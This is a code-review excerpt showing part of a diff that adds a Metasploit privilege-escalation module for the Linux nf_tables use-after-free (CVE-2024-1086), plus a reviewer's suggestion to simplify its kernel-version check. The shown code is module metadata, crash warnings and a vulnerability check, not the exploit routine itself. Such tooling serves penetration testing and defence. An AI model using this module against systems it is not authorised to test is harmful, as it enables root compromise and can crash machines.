modules/exploits/linux/local/netfilter_nf_tables_priv_esc.rb

```diff
@@ -0,0 +1,177 @@
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Netfilter nf_tables Linux Priv Esc',
+        'Description' => %q{
+          A use-after-free vulnerability in the Linux kernels netfilter: nf_tables component can be
+          exploited to achieve local privilege escalation. The nft_verdict_init() function allows
+          positive values as drop error within the hook verdict, and hence the nf_hook_slow() function
+          can cause a double free vulnerability when NF_DROP is issued with a drop error which
+          resembles NF_ACCEPT.
+
+          Devices with a WiFi interface will likely be unstable with this exploit and crash.
+
+          Successful exploitation will likely crash the original shell.
+
+          Failed exploitation will likely HARD crash the system or put it into an unreliable state
+          and it will need a physical reset/reboot. Attempted re-exploitation without a reboot will
+          hard crash the system.
+
+          Tested against a VM of Ubuntu 22.04 (Linux 5.15.0-60-generic)
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'Notselwyn' # original PoC
+        ],
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' => [[ 'Auto', {} ]],
+        'Privileged' => true,
+        'References' => [
+          [ 'URL', 'https://pwning.tech/nftables/'],
+          [ 'URL', 'https://github.com/Notselwyn/CVE-2024-1086'],
+          [ 'CVE', '2024-1086']
+        ],
+        'DefaultOptions' => {
+          # without these the system seems to hard crash in 2-6min
+          # with these i've had both shells and the system stable for over an hour
+          'PrependMigrate' => true,
+          'PrependFork' => true
+        },
+        'DisclosureDate' => '2024-01-31',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_OS_DOWN],
+          'Reliability' => [UNRELIABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, SCREEN_EFFECTS]
+        }
+      )
+    )
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def check
+    # there is likely backporting going on per distro as well
+    release = kernel_release
+    if (
+      Rex::Version.new(release.split('-').first) >= Rex::Version.new('5.15.0') &&
+      Rex::Version.new(release.split('-').first) < Rex::Version.new('6.0')
+    ) ||
+       (
+        Rex::Version.new(release.split('-').first) < Rex::Version.new('6.6') &&
+        Rex::Version.new(release.split('-').first) >= Rex::Version.new('6.0')
+      )
+      return CheckCode::Appears("Kernel version #{release} appears to be vulnerable")
+    end
```

Comment:
```suggestion
    release = kernel_release().split('-').first
    if release.between(Rex::Version.new('5.15.0'), Rex::Version.new('6.0'))
      return CheckCode::Appears("Kernel version #{release} appears to be vulnerable")
    elsif release.between(Rex::Version.new('6.0'), Rex::Version.new('6.6'))
      return CheckCode::Appears("Kernel version #{release} appears to be vulnerable")
    end
```

but it seems that this can be simplified even further to:

```
    release = kernel_release().split('-').first
    if release.between(Rex::Version.new('5.15.0'), Rex::Version.new('6.6'))
      return CheckCode::Appears("Kernel version #{release} appears to be vulnerable")
    end
```